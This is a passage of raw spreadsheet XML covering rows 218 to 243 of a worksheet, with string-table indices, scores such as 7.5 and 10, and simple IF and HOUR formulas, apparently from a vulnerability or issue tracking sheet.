      </c>
      <c r="H218" s="4">
        <v>7.5</v>
      </c>
      <c r="I218" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J218" s="4"/>
      <c r="K218" s="4"/>
      <c r="L218" s="4">
        <f>IF(out!$G218="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M218" s="4"/>
      <c r="N218" s="4"/>
      <c r="O218" s="13"/>
      <c r="P218" s="4"/>
      <c r="Q218" s="13">
        <f>HOUR(out!$P218 -out!$N218)</f>
        <v>0</v>
      </c>
      <c r="R218" s="18"/>
      <c r="S218" s="4"/>
      <c r="T218" s="4"/>
      <c r="U218" s="4"/>
      <c r="V218" s="7"/>
    </row>
    <row r="219" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A219" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B219" s="4" t="s">
        <v>1463</v>
      </c>
      <c r="C219" s="4" t="s">
        <v>1464</v>
      </c>
      <c r="D219" s="4" t="s">
        <v>1465</v>
      </c>
      <c r="E219" s="4" t="s">
        <v>1466</v>
      </c>
      <c r="F219" s="4" t="s">
        <v>1467</v>
      </c>
      <c r="G219" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H219" s="4">
        <v>7.5</v>
      </c>
      <c r="I219" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J219" s="4"/>
      <c r="K219" s="4"/>
      <c r="L219" s="4">
        <f>IF(out!$G219="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M219" s="4"/>
      <c r="N219" s="4"/>
      <c r="O219" s="13"/>
      <c r="P219" s="4"/>
      <c r="Q219" s="13">
        <f>HOUR(out!$P219 -out!$N219)</f>
        <v>0</v>
      </c>
      <c r="R219" s="18"/>
      <c r="S219" s="4"/>
      <c r="T219" s="4"/>
      <c r="U219" s="4"/>
      <c r="V219" s="7"/>
    </row>
    <row r="220" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A220" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B220" s="4" t="s">
        <v>1468</v>
      </c>
      <c r="C220" s="4" t="s">
        <v>1469</v>
      </c>
      <c r="D220" s="4" t="s">
        <v>1470</v>
      </c>
      <c r="E220" s="4" t="s">
        <v>1471</v>
      </c>
      <c r="F220" s="4" t="s">
        <v>1472</v>
      </c>
      <c r="G220" s="4" t="s">
        <v>1473</v>
      </c>
      <c r="H220" s="4">
        <v>7.5</v>
      </c>
      <c r="I220" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J220" s="4"/>
      <c r="K220" s="4"/>
      <c r="L220" s="4">
        <f>IF(out!$G220="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M220" s="4"/>
      <c r="N220" s="4"/>
      <c r="O220" s="13"/>
      <c r="P220" s="4"/>
      <c r="Q220" s="13">
        <f>HOUR(out!$P220 -out!$N220)</f>
        <v>0</v>
      </c>
      <c r="R220" s="18"/>
      <c r="S220" s="4"/>
      <c r="T220" s="4"/>
      <c r="U220" s="4"/>
      <c r="V220" s="7"/>
    </row>
    <row r="221" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A221" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B221" s="4" t="s">
        <v>1474</v>
      </c>
      <c r="C221" s="4" t="s">
        <v>1475</v>
      </c>
      <c r="D221" s="4" t="s">
        <v>1476</v>
      </c>
      <c r="E221" s="4" t="s">
        <v>1477</v>
      </c>
      <c r="F221" s="4" t="s">
        <v>1478</v>
      </c>
      <c r="G221" s="4" t="s">
        <v>1479</v>
      </c>
      <c r="H221" s="4">
        <v>7.5</v>
      </c>
      <c r="I221" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J221" s="4"/>
      <c r="K221" s="4"/>
      <c r="L221" s="4">
        <f>IF(out!$G221="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M221" s="4"/>
      <c r="N221" s="4"/>
      <c r="O221" s="13"/>
      <c r="P221" s="4"/>
      <c r="Q221" s="13">
        <f>HOUR(out!$P221 -out!$N221)</f>
        <v>0</v>
      </c>
      <c r="R221" s="18"/>
      <c r="S221" s="4"/>
      <c r="T221" s="4"/>
      <c r="U221" s="4"/>
      <c r="V221" s="7"/>
    </row>
    <row r="222" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A222" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B222" s="4" t="s">
        <v>1480</v>
      </c>
      <c r="C222" s="4" t="s">
        <v>1481</v>
      </c>
      <c r="D222" s="4" t="s">
        <v>1482</v>
      </c>
      <c r="E222" s="4" t="s">
        <v>1483</v>
      </c>
      <c r="F222" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G222" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H222" s="4">
        <v>7.5</v>
      </c>
      <c r="I222" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J222" s="4"/>
      <c r="K222" s="4"/>
      <c r="L222" s="4">
        <f>IF(out!$G222="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M222" s="4"/>
      <c r="N222" s="4"/>
      <c r="O222" s="13"/>
      <c r="P222" s="4"/>
      <c r="Q222" s="13">
        <f>HOUR(out!$P222 -out!$N222)</f>
        <v>0</v>
      </c>
      <c r="R222" s="18"/>
      <c r="S222" s="4"/>
      <c r="T222" s="4"/>
      <c r="U222" s="4"/>
      <c r="V222" s="7"/>
    </row>
    <row r="223" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A223" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B223" s="4" t="s">
        <v>1484</v>
      </c>
      <c r="C223" s="4" t="s">
        <v>1485</v>
      </c>
      <c r="D223" s="4" t="s">
        <v>1486</v>
      </c>
      <c r="E223" s="4" t="s">
        <v>1487</v>
      </c>
      <c r="F223" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G223" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H223" s="4">
        <v>5.3</v>
      </c>
      <c r="I223" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J223" s="4"/>
      <c r="K223" s="4"/>
      <c r="L223" s="4">
        <f>IF(out!$G223="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M223" s="4"/>
      <c r="N223" s="4"/>
      <c r="O223" s="13"/>
      <c r="P223" s="4"/>
      <c r="Q223" s="13">
        <f>HOUR(out!$P223 -out!$N223)</f>
        <v>0</v>
      </c>
      <c r="R223" s="18"/>
      <c r="S223" s="4"/>
      <c r="T223" s="4"/>
      <c r="U223" s="4"/>
      <c r="V223" s="7"/>
    </row>
    <row r="224" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A224" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B224" s="4" t="s">
        <v>1488</v>
      </c>
      <c r="C224" s="4" t="s">
        <v>1489</v>
      </c>
      <c r="D224" s="4" t="s">
        <v>1490</v>
      </c>
      <c r="E224" s="4" t="s">
        <v>1491</v>
      </c>
      <c r="F224" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G224" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H224" s="4">
        <v>7.5</v>
      </c>
      <c r="I224" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J224" s="4"/>
      <c r="K224" s="4"/>
      <c r="L224" s="4">
        <f>IF(out!$G224="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M224" s="4"/>
      <c r="N224" s="4"/>
      <c r="O224" s="13"/>
      <c r="P224" s="4"/>
      <c r="Q224" s="13">
        <f>HOUR(out!$P224 -out!$N224)</f>
        <v>0</v>
      </c>
      <c r="R224" s="18"/>
      <c r="S224" s="4"/>
      <c r="T224" s="4"/>
      <c r="U224" s="4"/>
      <c r="V224" s="7"/>
    </row>
    <row r="225" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A225" s="3" t="s">
        <v>1492</v>
      </c>
      <c r="B225" s="4" t="s">
        <v>1493</v>
      </c>
      <c r="C225" s="4" t="s">
        <v>1494</v>
      </c>
      <c r="D225" s="4" t="s">
        <v>1495</v>
      </c>
      <c r="E225" s="4" t="s">
        <v>1496</v>
      </c>
      <c r="F225" s="4" t="s">
        <v>1497</v>
      </c>
      <c r="G225" s="4" t="s">
        <v>1498</v>
      </c>
      <c r="H225" s="4">
        <v>7.5</v>
      </c>
      <c r="I225" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J225" s="4"/>
      <c r="K225" s="4"/>
      <c r="L225" s="4">
        <f>IF(out!$G225="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M225" s="4"/>
      <c r="N225" s="4"/>
      <c r="O225" s="13"/>
      <c r="P225" s="4"/>
      <c r="Q225" s="13">
        <f>HOUR(out!$P225 -out!$N225)</f>
        <v>0</v>
      </c>
      <c r="R225" s="18"/>
      <c r="S225" s="4"/>
      <c r="T225" s="4"/>
      <c r="U225" s="4"/>
      <c r="V225" s="7"/>
    </row>
    <row r="226" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A226" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B226" s="4" t="s">
        <v>1499</v>
      </c>
      <c r="C226" s="4" t="s">
        <v>1500</v>
      </c>
      <c r="D226" s="4" t="s">
        <v>1501</v>
      </c>
      <c r="E226" s="4" t="s">
        <v>1502</v>
      </c>
      <c r="F226" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G226" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H226" s="4">
        <v>7.5</v>
      </c>
      <c r="I226" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J226" s="4"/>
      <c r="K226" s="4"/>
      <c r="L226" s="4">
        <f>IF(out!$G226="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M226" s="4"/>
      <c r="N226" s="4"/>
      <c r="O226" s="13"/>
      <c r="P226" s="4"/>
      <c r="Q226" s="13">
        <f>HOUR(out!$P226 -out!$N226)</f>
        <v>0</v>
      </c>
      <c r="R226" s="18"/>
      <c r="S226" s="4"/>
      <c r="T226" s="4"/>
      <c r="U226" s="4"/>
      <c r="V226" s="7"/>
    </row>
    <row r="227" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A227" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B227" s="4" t="s">
        <v>1503</v>
      </c>
      <c r="C227" s="4" t="s">
        <v>1504</v>
      </c>
      <c r="D227" s="4" t="s">
        <v>1505</v>
      </c>
      <c r="E227" s="4" t="s">
        <v>1506</v>
      </c>
      <c r="F227" s="4" t="s">
        <v>1507</v>
      </c>
      <c r="G227" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H227" s="4">
        <v>7.5</v>
      </c>
      <c r="I227" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J227" s="4"/>
      <c r="K227" s="4"/>
      <c r="L227" s="4">
        <f>IF(out!$G227="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M227" s="4"/>
      <c r="N227" s="4"/>
      <c r="O227" s="13"/>
      <c r="P227" s="4"/>
      <c r="Q227" s="13">
        <f>HOUR(out!$P227 -out!$N227)</f>
        <v>0</v>
      </c>
      <c r="R227" s="18"/>
      <c r="S227" s="4"/>
      <c r="T227" s="4"/>
      <c r="U227" s="4"/>
      <c r="V227" s="7"/>
    </row>
    <row r="228" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A228" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B228" s="4" t="s">
        <v>1508</v>
      </c>
      <c r="C228" s="4" t="s">
        <v>1509</v>
      </c>
      <c r="D228" s="4" t="s">
        <v>1510</v>
      </c>
      <c r="E228" s="4" t="s">
        <v>1511</v>
      </c>
      <c r="F228" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G228" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H228" s="4">
        <v>7.5</v>
      </c>
      <c r="I228" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J228" s="4"/>
      <c r="K228" s="4"/>
      <c r="L228" s="4">
        <f>IF(out!$G228="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M228" s="4"/>
      <c r="N228" s="4"/>
      <c r="O228" s="13"/>
      <c r="P228" s="4"/>
      <c r="Q228" s="13">
        <f>HOUR(out!$P228 -out!$N228)</f>
        <v>0</v>
      </c>
      <c r="R228" s="18"/>
      <c r="S228" s="4"/>
      <c r="T228" s="4"/>
      <c r="U228" s="4"/>
      <c r="V228" s="7"/>
    </row>
    <row r="229" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A229" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B229" s="4" t="s">
        <v>1512</v>
      </c>
      <c r="C229" s="4" t="s">
        <v>1513</v>
      </c>
      <c r="D229" s="4" t="s">
        <v>1514</v>
      </c>
      <c r="E229" s="4" t="s">
        <v>1515</v>
      </c>
      <c r="F229" s="4" t="s">
        <v>1507</v>
      </c>
      <c r="G229" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H229" s="4">
        <v>7.5</v>
      </c>
      <c r="I229" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J229" s="4"/>
      <c r="K229" s="4"/>
      <c r="L229" s="4">
        <f>IF(out!$G229="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M229" s="4"/>
      <c r="N229" s="4"/>
      <c r="O229" s="13"/>
      <c r="P229" s="4"/>
      <c r="Q229" s="13">
        <f>HOUR(out!$P229 -out!$N229)</f>
        <v>0</v>
      </c>
      <c r="R229" s="18"/>
      <c r="S229" s="4"/>
      <c r="T229" s="4"/>
      <c r="U229" s="4"/>
      <c r="V229" s="7"/>
    </row>
    <row r="230" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A230" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B230" s="4" t="s">
        <v>1516</v>
      </c>
      <c r="C230" s="4" t="s">
        <v>1517</v>
      </c>
      <c r="D230" s="4" t="s">
        <v>1518</v>
      </c>
      <c r="E230" s="4" t="s">
        <v>1519</v>
      </c>
      <c r="F230" s="4" t="s">
        <v>1507</v>
      </c>
      <c r="G230" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H230" s="4">
        <v>7.5</v>
      </c>
      <c r="I230" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J230" s="4"/>
      <c r="K230" s="4"/>
      <c r="L230" s="4">
        <f>IF(out!$G230="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M230" s="4"/>
      <c r="N230" s="4"/>
      <c r="O230" s="13"/>
      <c r="P230" s="4"/>
      <c r="Q230" s="13">
        <f>HOUR(out!$P230 -out!$N230)</f>
        <v>0</v>
      </c>
      <c r="R230" s="18"/>
      <c r="S230" s="4"/>
      <c r="T230" s="4"/>
      <c r="U230" s="4"/>
      <c r="V230" s="7"/>
    </row>
    <row r="231" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A231" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B231" s="4" t="s">
        <v>1520</v>
      </c>
      <c r="C231" s="4" t="s">
        <v>1521</v>
      </c>
      <c r="D231" s="4" t="s">
        <v>1522</v>
      </c>
      <c r="E231" s="4" t="s">
        <v>1523</v>
      </c>
      <c r="F231" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G231" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H231" s="4">
        <v>7.5</v>
      </c>
      <c r="I231" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J231" s="4"/>
      <c r="K231" s="4"/>
      <c r="L231" s="4">
        <f>IF(out!$G231="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M231" s="4"/>
      <c r="N231" s="4"/>
      <c r="O231" s="13"/>
      <c r="P231" s="4"/>
      <c r="Q231" s="13">
        <f>HOUR(out!$P231 -out!$N231)</f>
        <v>0</v>
      </c>
      <c r="R231" s="18"/>
      <c r="S231" s="4"/>
      <c r="T231" s="4"/>
      <c r="U231" s="4"/>
      <c r="V231" s="7"/>
    </row>
    <row r="232" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A232" s="3" t="s">
        <v>1524</v>
      </c>
      <c r="B232" s="4" t="s">
        <v>1525</v>
      </c>
      <c r="C232" s="4" t="s">
        <v>1526</v>
      </c>
      <c r="D232" s="4" t="s">
        <v>1527</v>
      </c>
      <c r="E232" s="4" t="s">
        <v>1528</v>
      </c>
      <c r="F232" s="4" t="s">
        <v>530</v>
      </c>
      <c r="G232" s="4" t="s">
        <v>531</v>
      </c>
      <c r="H232" s="4">
        <v>10</v>
      </c>
      <c r="I232" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J232" s="4"/>
      <c r="K232" s="4"/>
      <c r="L232" s="4">
        <f>IF(out!$G232="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M232" s="4"/>
      <c r="N232" s="4"/>
      <c r="O232" s="13"/>
      <c r="P232" s="4"/>
      <c r="Q232" s="13">
        <f>HOUR(out!$P232 -out!$N232)</f>
        <v>0</v>
      </c>
      <c r="R232" s="18"/>
      <c r="S232" s="4"/>
      <c r="T232" s="4"/>
      <c r="U232" s="4"/>
      <c r="V232" s="7"/>
    </row>
    <row r="233" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A233" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B233" s="4" t="s">
        <v>1529</v>
      </c>
      <c r="C233" s="4" t="s">
        <v>1530</v>
      </c>
      <c r="D233" s="4" t="s">
        <v>1531</v>
      </c>
      <c r="E233" s="4" t="s">
        <v>1532</v>
      </c>
      <c r="F233" s="4" t="s">
        <v>1533</v>
      </c>
      <c r="G233" s="4" t="s">
        <v>1534</v>
      </c>
      <c r="H233" s="4">
        <v>7.5</v>
      </c>
      <c r="I233" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J233" s="4"/>
      <c r="K233" s="4"/>
      <c r="L233" s="4">
        <f>IF(out!$G233="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M233" s="4"/>
      <c r="N233" s="4"/>
      <c r="O233" s="13"/>
      <c r="P233" s="4"/>
      <c r="Q233" s="13">
        <f>HOUR(out!$P233 -out!$N233)</f>
        <v>0</v>
      </c>
      <c r="R233" s="18"/>
      <c r="S233" s="4"/>
      <c r="T233" s="4"/>
      <c r="U233" s="4"/>
      <c r="V233" s="7"/>
    </row>
    <row r="234" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A234" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B234" s="4" t="s">
        <v>1535</v>
      </c>
      <c r="C234" s="4" t="s">
        <v>1536</v>
      </c>
      <c r="D234" s="4" t="s">
        <v>1537</v>
      </c>
      <c r="E234" s="4" t="s">
        <v>1538</v>
      </c>
      <c r="F234" s="4" t="s">
        <v>1539</v>
      </c>
      <c r="G234" s="4" t="s">
        <v>431</v>
      </c>
      <c r="H234" s="4">
        <v>5.3</v>
      </c>
      <c r="I234" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J234" s="4"/>
      <c r="K234" s="4"/>
      <c r="L234" s="4">
        <f>IF(out!$G234="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M234" s="4"/>
      <c r="N234" s="4"/>
      <c r="O234" s="13"/>
      <c r="P234" s="4"/>
      <c r="Q234" s="13">
        <f>HOUR(out!$P234 -out!$N234)</f>
        <v>0</v>
      </c>
      <c r="R234" s="18"/>
      <c r="S234" s="4"/>
      <c r="T234" s="4"/>
      <c r="U234" s="4"/>
      <c r="V234" s="7"/>
    </row>
    <row r="235" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A235" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B235" s="4" t="s">
        <v>1540</v>
      </c>
      <c r="C235" s="4" t="s">
        <v>1541</v>
      </c>
      <c r="D235" s="4" t="s">
        <v>1542</v>
      </c>
      <c r="E235" s="4" t="s">
        <v>1543</v>
      </c>
      <c r="F235" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G235" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H235" s="4">
        <v>7.5</v>
      </c>
      <c r="I235" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J235" s="4"/>
      <c r="K235" s="4"/>
      <c r="L235" s="4">
        <f>IF(out!$G235="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M235" s="4"/>
      <c r="N235" s="4"/>
      <c r="O235" s="13"/>
      <c r="P235" s="4"/>
      <c r="Q235" s="13">
        <f>HOUR(out!$P235 -out!$N235)</f>
        <v>0</v>
      </c>
      <c r="R235" s="18"/>
      <c r="S235" s="4"/>
      <c r="T235" s="4"/>
      <c r="U235" s="4"/>
      <c r="V235" s="7"/>
    </row>
    <row r="236" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A236" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B236" s="4" t="s">
        <v>1544</v>
      </c>
      <c r="C236" s="4" t="s">
        <v>1545</v>
      </c>
      <c r="D236" s="4" t="s">
        <v>1546</v>
      </c>
      <c r="E236" s="4" t="s">
        <v>1547</v>
      </c>
      <c r="F236" s="4" t="s">
        <v>1507</v>
      </c>
      <c r="G236" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H236" s="4">
        <v>7.5</v>
      </c>
      <c r="I236" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J236" s="4"/>
      <c r="K236" s="4"/>
      <c r="L236" s="4">
        <f>IF(out!$G236="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M236" s="4"/>
      <c r="N236" s="4"/>
      <c r="O236" s="13"/>
      <c r="P236" s="4"/>
      <c r="Q236" s="13">
        <f>HOUR(out!$P236 -out!$N236)</f>
        <v>0</v>
      </c>
      <c r="R236" s="18"/>
      <c r="S236" s="4"/>
      <c r="T236" s="4"/>
      <c r="U236" s="4"/>
      <c r="V236" s="7"/>
    </row>
    <row r="237" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A237" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B237" s="4" t="s">
        <v>1548</v>
      </c>
      <c r="C237" s="4" t="s">
        <v>1549</v>
      </c>
      <c r="D237" s="4" t="s">
        <v>1550</v>
      </c>
      <c r="E237" s="4" t="s">
        <v>1551</v>
      </c>
      <c r="F237" s="4" t="s">
        <v>1507</v>
      </c>
      <c r="G237" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H237" s="4">
        <v>7.5</v>
      </c>
      <c r="I237" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J237" s="4"/>
      <c r="K237" s="4"/>
      <c r="L237" s="4">
        <f>IF(out!$G237="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M237" s="4"/>
      <c r="N237" s="4"/>
      <c r="O237" s="13"/>
      <c r="P237" s="4"/>
      <c r="Q237" s="13">
        <f>HOUR(out!$P237 -out!$N237)</f>
        <v>0</v>
      </c>
      <c r="R237" s="18"/>
      <c r="S237" s="4"/>
      <c r="T237" s="4"/>
      <c r="U237" s="4"/>
      <c r="V237" s="7"/>
    </row>
    <row r="238" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A238" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B238" s="4" t="s">
        <v>1552</v>
      </c>
      <c r="C238" s="4" t="s">
        <v>1553</v>
      </c>
      <c r="D238" s="4" t="s">
        <v>1554</v>
      </c>
      <c r="E238" s="4" t="s">
        <v>1555</v>
      </c>
      <c r="F238" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G238" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H238" s="4">
        <v>7.5</v>
      </c>
      <c r="I238" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J238" s="4"/>
      <c r="K238" s="4"/>
      <c r="L238" s="4">
        <f>IF(out!$G238="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M238" s="4"/>
      <c r="N238" s="4"/>
      <c r="O238" s="13"/>
      <c r="P238" s="4"/>
      <c r="Q238" s="13">
        <f>HOUR(out!$P238 -out!$N238)</f>
        <v>0</v>
      </c>
      <c r="R238" s="18"/>
      <c r="S238" s="4"/>
      <c r="T238" s="4"/>
      <c r="U238" s="4"/>
      <c r="V238" s="7"/>
    </row>
    <row r="239" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A239" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B239" s="4" t="s">
        <v>1556</v>
      </c>
      <c r="C239" s="4" t="s">
        <v>1557</v>
      </c>
      <c r="D239" s="4" t="s">
        <v>1558</v>
      </c>
      <c r="E239" s="4" t="s">
        <v>1559</v>
      </c>
      <c r="F239" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G239" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H239" s="4">
        <v>7.5</v>
      </c>
      <c r="I239" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J239" s="4"/>
      <c r="K239" s="4"/>
      <c r="L239" s="4">
        <f>IF(out!$G239="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M239" s="4"/>
      <c r="N239" s="4"/>
      <c r="O239" s="13"/>
      <c r="P239" s="4"/>
      <c r="Q239" s="13">
        <f>HOUR(out!$P239 -out!$N239)</f>
        <v>0</v>
      </c>
      <c r="R239" s="18"/>
      <c r="S239" s="4"/>
      <c r="T239" s="4"/>
      <c r="U239" s="4"/>
      <c r="V239" s="7"/>
    </row>
    <row r="240" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A240" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B240" s="4" t="s">
        <v>1560</v>
      </c>
      <c r="C240" s="4" t="s">
        <v>1561</v>
      </c>
      <c r="D240" s="4" t="s">
        <v>1562</v>
      </c>
      <c r="E240" s="4" t="s">
        <v>1563</v>
      </c>
      <c r="F240" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G240" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H240" s="4">
        <v>7.5</v>
      </c>
      <c r="I240" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J240" s="4"/>
      <c r="K240" s="4"/>
      <c r="L240" s="4">
        <f>IF(out!$G240="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M240" s="4"/>
      <c r="N240" s="4"/>
      <c r="O240" s="13"/>
      <c r="P240" s="4"/>
      <c r="Q240" s="13">
        <f>HOUR(out!$P240 -out!$N240)</f>
        <v>0</v>
      </c>
      <c r="R240" s="18"/>
      <c r="S240" s="4"/>
      <c r="T240" s="4"/>
      <c r="U240" s="4"/>
      <c r="V240" s="7"/>
    </row>
    <row r="241" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A241" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B241" s="4" t="s">
        <v>1564</v>
      </c>
      <c r="C241" s="4" t="s">
        <v>1565</v>
      </c>
      <c r="D241" s="4" t="s">
        <v>1566</v>
      </c>
      <c r="E241" s="4" t="s">
        <v>1567</v>
      </c>
      <c r="F241" s="4" t="s">
        <v>1568</v>
      </c>
      <c r="G241" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H241" s="4">
        <v>7.5</v>
      </c>
      <c r="I241" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J241" s="4"/>
      <c r="K241" s="4"/>
      <c r="L241" s="4">
        <f>IF(out!$G241="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M241" s="4"/>
      <c r="N241" s="4"/>
      <c r="O241" s="13"/>
      <c r="P241" s="4"/>
      <c r="Q241" s="13">
        <f>HOUR(out!$P241 -out!$N241)</f>
        <v>0</v>
      </c>
      <c r="R241" s="18"/>
      <c r="S241" s="4"/>
      <c r="T241" s="4"/>
      <c r="U241" s="4"/>
      <c r="V241" s="7"/>
    </row>
    <row r="242" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A242" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B242" s="4" t="s">
        <v>1569</v>
      </c>
      <c r="C242" s="4" t="s">
        <v>1570</v>
      </c>
      <c r="D242" s="4" t="s">
        <v>1571</v>
      </c>
      <c r="E242" s="4" t="s">
        <v>1572</v>
      </c>
      <c r="F242" s="4" t="s">
        <v>1507</v>
      </c>
      <c r="G242" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H242" s="4">
        <v>7.5</v>
      </c>
      <c r="I242" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J242" s="4"/>
      <c r="K242" s="4"/>
      <c r="L242" s="4">
        <f>IF(out!$G242="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M242" s="4"/>
      <c r="N242" s="4"/>
      <c r="O242" s="13"/>
      <c r="P242" s="4"/>
      <c r="Q242" s="13">
        <f>HOUR(out!$P242 -out!$N242)</f>
        <v>0</v>
      </c>
      <c r="R242" s="18"/>
      <c r="S242" s="4"/>
      <c r="T242" s="4"/>
      <c r="U242" s="4"/>
      <c r="V242" s="7"/>
    </row>
    <row r="243" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A243" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B243" s="4" t="s">
        <v>1573</v>
      </c>
      <c r="C243" s="4" t="s">
        <v>1574</v>
      </c>
      <c r="D243" s="4" t="s">
        <v>1575</v>
      </c>
      <c r="E243" s="4" t="s">
        <v>1576</v>
      </c>
      <c r="F243" s="4" t="s">
        <v>1507</v>
      </c>
      <c r="G243" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H243" s="4">
        <v>7.5</v>
      </c>
      <c r="I243" s="4" t="s">
